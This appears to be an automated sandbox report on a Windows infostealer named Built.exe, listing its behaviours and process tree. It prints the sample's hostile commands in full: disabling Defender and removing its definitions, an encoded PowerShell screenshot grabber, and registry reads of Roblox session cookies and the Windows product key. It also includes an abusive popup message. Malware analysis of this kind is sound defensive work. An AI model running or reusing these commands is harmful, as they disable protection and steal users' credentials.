Analysis

  • max time kernel
    96s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-10-2024 12:56

General

  • Target

    Built.exe

  • Size

    7.5MB

  • MD5

    77ce148ebc6b40ab91443366a25e1701

  • SHA1

    2e7cc8aad370ffb8b3943ecab6a16cdb0b7deac3

  • SHA256

    710acafa5ccbe58fb2000bd23161ca1fa70e1080bbe244bfa794a733d1f931c5

  • SHA512

    fc46de3075c7a6c28c9f3aeb21e5b9f5e2122484388fb183da8f799bb3b26840746102cd15a2d523d6c71573c74b44f8410debf29d7aae43901d63171ff2d18a

  • SSDEEP

    196608:OXQCwuLTurErvI9pWjgN3ZdahF0pbH1AY7CtQsNI/Sx3C1b:T4urEUWjqeWxA6nAYb

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1728
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:832
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3444
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4972
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('BRWEE GANDUU', 0, 'MAA CHUDAOO ', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5072
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('BRWEE GANDUU', 0, 'MAA CHUDAOO ', 0+16);close()"
          4⤵
            PID:1084
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4548
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1460
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1444
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4516
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4152
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4304
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:2456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4996
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1804
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1296
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2808
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:4360
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1960
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:2872
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2608
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5bj2g0ni\5bj2g0ni.cmdline"
                5⤵
                  PID:3664
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAEED.tmp" "c:\Users\Admin\AppData\Local\Temp\5bj2g0ni\CSCF6D0B1E973234335A64476965B184D87.TMP"
                    6⤵
                      PID:324
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4816
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:864
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4624
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1116
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4544
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:1484
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4080
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:4984
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:788
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1800
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:864
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4368
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:5060
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3264
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:4388
                                  • C:\Windows\system32\getmac.exe
                                    getmac
                                    4⤵
                                      PID:3160
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI17282\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\RavXR.zip" *"
                                    3⤵
                                      PID:2700
                                      • C:\Users\Admin\AppData\Local\Temp\_MEI17282\rar.exe
                                        C:\Users\Admin\AppData\Local\Temp\_MEI17282\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\RavXR.zip" *
                                        4⤵
                                        • Executes dropped EXE
                                        PID:2172
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                      3⤵
                                        PID:2968
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic os get Caption
                                          4⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1028
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                        3⤵
                                          PID:4312
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic computersystem get totalphysicalmemory
                                            4⤵
                                              PID:1000
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                            3⤵
                                              PID:2120
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic csproduct get uuid
                                                4⤵
                                                  PID:4632
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                3⤵
                                                  PID:5112
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2928
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  3⤵
                                                    PID:3444
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      4⤵
                                                      • Detects videocard installed
                                                      PID:440
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                    3⤵
                                                      PID:3620
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3928

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                  SHA1

                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                  SHA256

                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                  SHA512

                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  d28a889fd956d5cb3accfbaf1143eb6f

                                                  SHA1

                                                  157ba54b365341f8ff06707d996b3635da8446f7

                                                  SHA256

                                                  21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                  SHA512

                                                  0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  62623d22bd9e037191765d5083ce16a3

                                                  SHA1

                                                  4a07da6872672f715a4780513d95ed8ddeefd259

                                                  SHA256

                                                  95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                  SHA512

                                                  9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  9d9e705ca093c4764faefe905fe84345

                                                  SHA1

                                                  c5e62bb784f8a9e8d25809dc80cc1302f38988d5

                                                  SHA256

                                                  e613602ca5bb32b5c80fd0108e4bda25a38dba0edd72fdc1b20ac02ab8b697a8

                                                  SHA512

                                                  a31bae5e43a9a666cdd817d6494ca64915abc6f887a9e00b01d5ce413768f3baee9053810e27d94172fa4c803f366f9fce62a06a2d4cd070708481e2338e8311

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  276798eeb29a49dc6e199768bc9c2e71

                                                  SHA1

                                                  5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                  SHA256

